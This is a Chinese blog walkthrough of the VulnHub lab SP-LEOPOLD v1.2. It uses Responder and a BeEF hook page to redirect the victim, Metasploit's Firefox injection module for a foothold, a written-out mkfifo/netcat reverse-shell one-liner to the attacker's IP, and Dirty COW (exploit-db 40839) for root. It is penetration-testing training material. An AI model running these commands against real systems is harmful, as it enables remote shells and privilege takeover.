【甄选靶场】Vulnhub百个项目渗透——项目五十五:SP-LEOPOLD v1.2(beef联动msf,脏牛提权)

最新推荐文章于 2024-01-02 23:57:13 发布
最新推荐文章于 2024-01-02 23:57:13 发布
阅读量1.3k 收藏 2
点赞数
分类专栏: vulnhub百个项目渗透 文章标签: 网络 服务器 运维 渗透测试 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_65527369/article/details/128731174
版权

Vulnhub百个项目渗透

Vulnhub百个项目渗透——项目五十五:SP-LEOPOLD v1.2(beef联动msf,脏牛提权)

🔥系列专栏:Vulnhub百个项目渗透
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2023年1月19日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

巅峰之路

前言

本文章仅用作实验学习,实验环境均为自行搭建的公开vuinhub靶场,仅使用kali虚拟机作为操作学习工具。本文仅用作学习记录,不做任何导向。请勿在现实环境中模仿,操作。

信息收集

nmap 192.168.253.0/24 -sP

在这里插入图片描述

└─# nmap -p- --min-rate 10000 -A 192.168.247.147

139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.6.6 (workgroup: WORKGROUP)

在渗透测试中,使用Responder开启回应请求功能,Responuer会自动回应客户端的请求并声明自己就是被输人了错误计算机名的那台机器,并且尝试建立SMB连接。客户端项发送自已的Nt-NTeLM Hash进行身份验证,此时将得到目标机器的Net-NTLM Hash!!

它是一个专注于Web浏览器的渗透测试工具。 ​BeEF使专业的渗透测试人员可以使用客户端攻击向量来评估目标环境的实际安全状况。 与其他安全框架不同,BeEF超越了硬化的网络边界和客户端系统,并在一个门户开放的环境中检查可利用性:Web浏览器。

设置重定向
gedit /usr/share/responder/files/rong.html

在这里插入图片描述

<html><meta http-equiv="refresh" content="0; URL='http://192.168.247.130:3000/demos/basic.html'" /></html>
修改配置

gedit /usr/share/responder/Responder.conf
80行修改:
Serve-Html = On

82行修改:
HtmlFilename = files/rong.html

在这里插入图片描述
在这里插入图片描述
如果嘈杂,可以修改41行为受害者ip来过滤
而后在开启responder之后就会看到如图,说明过滤成功
在这里插入图片描述

开启beef监听
responder --basic -I eth0      #开启监听 

systemctl start beef-xss.service  #开启beef
systemctl stop beef-xss.service     #关闭beef
systemctl restart beef-xss.service  #重启beef
systemctl status beef-xss    #查看状态

在这里插入图片描述

初始账号密码都是beef

过一会就能看到在面板出现火狐浏览器的标志,并且看到版本是16

在这里插入图片描述并且能看到kali终端监听那一块有这样的
在这里插入图片描述
接下来就要去到msf联动

联动msf
use multi/browser/firefox_tostring_console_injection

run  
过一会会出现如下字样

[*] Using URL: http://192.168.253.138:8080/OnBp6P92HK

然后将rong.html的url部分修改为:http://192.168.253.138:8080/OnBp6P92HK
然后重新运行:
Responder.py --basic -I eth0 
sessions -i 1
这时候我们就可以得到一个shell,但是因为这个shell不好用,所以我们简单的反弹一个shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.253.138 1234 >/tmp/f
nc -vlp 1234

建立一个python终端
python -c 'import pty;pty.spawn("/bin/bash")'

提权

linux版本脆弱
1)Linux version 3.5.0-17-generic
linpeas建议使用脏牛


cp /usr/share/exploitdb/exploits/linux/local/40839.c .
传递过去编译如下
gcc -pthread 40839.c -o dirty -lcrypt
chmod +x dirty
密码输入:rong   ---等待几十秒

su firefart
rong
人间体佐菲
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
VulnHub靶场系列:Chili
快吃小蛋糕吧的博客
10-05 1319
VulnHub靶场系列:Chili 刚刚在VulnHub官网上找了些简单的靶机,感觉这个还挺适合新手的 环境部署: https://download.vulnhub.com/chili/Chili.ova 实战: 首先使用工具扫描靶机所在网段,得到靶机IP: root@kali:/# nmap -sP 192.168.200.129/24 Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-05 08:56 CST Nmap scan report f
metasploit联动beef启动
weixin_30535843的博客
06-13 129
(温馨提示:请按照步骤来,否则beef到后面会启动不了) 我们首先进入vim /usr/share/beef-xss/config.yaml 找到metasploit把它改为启动 把false改为true :wq!保存退出 进入beef下的extensions/metasploit目录,并用vim打开config.yaml配置文件 把host那改为本地ip 在这里填入m...
VulnHub靶场笔记 - Brainpan(OSCP推荐靶场
最新发布
m0_62652276的博客
01-02 971
首先,在main函数中,buf可以接收的大小为1000,但此处strcpy()函数将source(即buf)拷贝到Destination中,但Destination的大小为520,说明可以进行溢出。打开WinDbg,选择“运行可执行程序”,选择brainpain.exe,然后在命令框中输入g,开始运行。重启WinDbg中的程序,g运行;不过,上述代码中,需要将单引号和双引号互换,可以在记事本中借助中间字符完成这个操作。重启WinDbg中的程序,g运行,然后在Kali中执行exp.py。
VulnHub靶场笔记 - DevGuru: 1(OSCP推荐靶场
m0_62652276的博客
12-02 1150
OSCP推荐靶场VulnHub DevGuru: 1 个人打靶笔记
Kali BeEF MSF的使用
baynk的博客
05-14 1466
0x00 BeEF BeEF( The Browser Exploitation Framework) 是由Wade Alcorn 在2006年开始创建的,是由ruby语言开发的专门针对浏览器攻击的框架。BeeF是前欧美最流行的web框架攻击平台,kali 集成BeEf,而且BeEf有很多好使的payload。例如BeEF可以通过一段编制好的javascript控制目标主机的浏览器,通过浏览器拿到各种信息并且扫描内网信息,同时能够配合metasploit进一步渗透主机。 不过在目前,BeEF使用的人比较少,
webDev_A_Spring2021:DM-UY 2193 A部分-丽贝卡·利奥波德(Rebecca Leopold
04-19
纽约大学丹顿工程学院技术,文化+社会| 综合数字媒体Intro to Web Development - Spring 2021DM-UY 2193 Section A | January 28 - May 10Monday + Wednesday 6:00-7:50 pm | IDM - Room 311 + ONLINEProfessor: ...
leopold_fc660m_mac_mods:有用的模组,以使Leopold FC660M在Mac上更好地工作
05-15
leopold_fc660m_mac_mods 有用的模组,以使Leopold FC660M在Mac上更好地工作 这些mod需要出色的 karabiner-import.sh 下载此配置文件以使Leopold FC660M在Mac上正常运行: 导入配置文件: $ sh ~/Desktop/...
应用多变量统计分析-Wolfgang&Leopold;-2012
07-09
应用多变量统计分析-Wolfgang Karl Härdle 和Léopold Simar-2012, 第三版,Springer
leopold:自定义Slackbot,用于管理小组彩排时间和演出时间(带有Google日历)和待办事项列表(带有Asana)
04-18
利奥波德 自定义Slackbot,用于管理小组彩排时间和演出时间(带有Google日历)和待办事项列表(带有Asana)。
vulnhub靶场-AdmX
qq_42947816的博客
05-29 1295
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
vulnhub靶场-tomato
qq_42947816的博客
03-07 7500
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
vulnhub靶场-Nagini
qq_42947816的博客
11-01 1874
Nagini 是 HarryPotter VM 系列的第二个 VM,您需要在其中找到隐藏在机器内的 3 个魂器(哈利波特系列的 3 个 VM 中总共隐藏了 8 个魂器)并最终击败 Voldemort
Vulnhub靶场Prime_Series_Level-1渗透
m0_65712192的博客
02-12 1602
Vulnhub靶场Prime_Series_Level-1渗透
vulnhub之devguru靶场打靶
maple_leaf
10-19 436
​ Devguru是vulnhub中一个靶场,DevGuru 是一家虚构的网络开发公司,聘请您进行渗透测试评估。您的任务是在其公司网站上查找漏洞并获得root
脏牛提权靶机
m0_73482536的博客
05-10 219
练习的靶机
vulnhub靶场实战系列(一)之vulnhub靶场介绍
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
03-07 2926
我们在学习了各种web漏洞的原理和各种内网的攻击手法的利用之后,需要实战来提升经验,这一环节就可以有操作系统靶场平台来代替一方面因为靶场是现成的,已经搭建好的靶场,只需要下载到本地用虚拟机安装就可以了,非常省时。第二点,非常安全,我们要知道没有经过法律允许的渗透行为是犯法的,而我们使用靶场来模拟达到实战训练的目的的同时也不会触碰法律。名称描述网站vulnhub与Kali同一家公司(offsec)出品。一共有600多个镜像,可以在VMWare或者VirtualBox打开,有不同难度。
【内网渗透vulnhub三个基础靶场wp
weixin_51614272的博客
09-15 2779
ssh、msf、webdav、linux、kali、basic_pentesting_1、Me-and-My-Girlfriend-1、narak
靶机Lampiao之脏牛提权
m0_52754338的博客
10-02 1528
同样,将下载好的脏牛EXP,上传至目标靶机中,然后msf进入shell,然后编译成可执行文件,利用python开一个模拟终端,开启终端相当于ssh连接(通俗理解),有一个交互式连接。发现是Drupal的网站,查找相关的漏洞,存在远程代码执行的漏洞,msf中带有payload直接利用,设置攻击ip和端口,运行即可。可以看出,真正拿下Linux,权限还是不够,对Linux进行信息收集,查看可以用的漏洞,并提升权限至root。扫描靶机的端口,查看开放了哪些端口,发现1898端口开放,尝试访问。
提权_Linux 脏牛漏洞提权Vulnhub靶场 Lampiao】
草木
12-07 3285
1.nmap 扫描主机 扫描同网段存活主机 扫描目标主机开放端口,扫描到开放了1898端口 nmap -p1-65535 192.168.61.138 2.发现web网站,搜集利用漏洞 通过开放的1898端口进入网站,看到目标网站,发现网站cms是drupal msf 搜索drupal漏洞,使用可利用漏洞进行攻击 >search drupal >use exploit/unix/webapp/drupal_drupalgeddon2 >set rhosts 192.
哪个品牌的键盘比较好?
05-21
有很多品牌的键盘都非常优秀,具体要看你的需求和预算。以下是一些常见的键盘品牌: 1. Corsair:以高端机械键盘知名,适合游戏玩家和打字员。 2. Logitech:以无线键盘著名,适合需要移动自由度的用户。 3. Razer:以游戏外设知名,适合游戏玩家。 4. Apple:以设计简洁、品质高端著称,适合苹果设备用户。 5. Microsoft:以功能强大、舒适度高著称,适合办公使用。 6. Filco:以极简主义设计、高品质和可靠性著称,适合打字员和程序员。 7. Leopold:以高品质和打字体验著名,尤其适合打字员和程序员。 总之,选择适合自己的键盘品牌要根据自己的使用需求和预算来决定。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

人间体佐菲

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值